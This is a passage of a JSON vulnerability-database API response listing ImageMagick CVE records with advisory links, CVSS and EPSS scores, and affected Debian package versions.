"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/306c1f0fa5754ca78efd16ab752f0e981d4f6b82", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/306c1f0fa5754ca78efd16ab752f0e981d4f6b82" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1454" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "http://www.securityfocus.com/bid/106847", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/106847" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672564", "reference_id": "1672564", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672564" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:graphicsmagick:graphicsmagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:graphicsmagick:graphicsmagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:graphicsmagick:graphicsmagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7397", "reference_id": "CVE-2019-7397", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:N/C:N/I:N/A:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7397" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-7397" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3qad-mewf-8khz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81994?format=api", "vulnerability_id": "VCID-3zbe-p6ue-ffe8", "summary": "ImageMagick: division by zero at MagickCore/segment.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27765.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27765.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27765", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27765" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27765", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27765" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894684", "reference_id": "1894684", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894684" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" 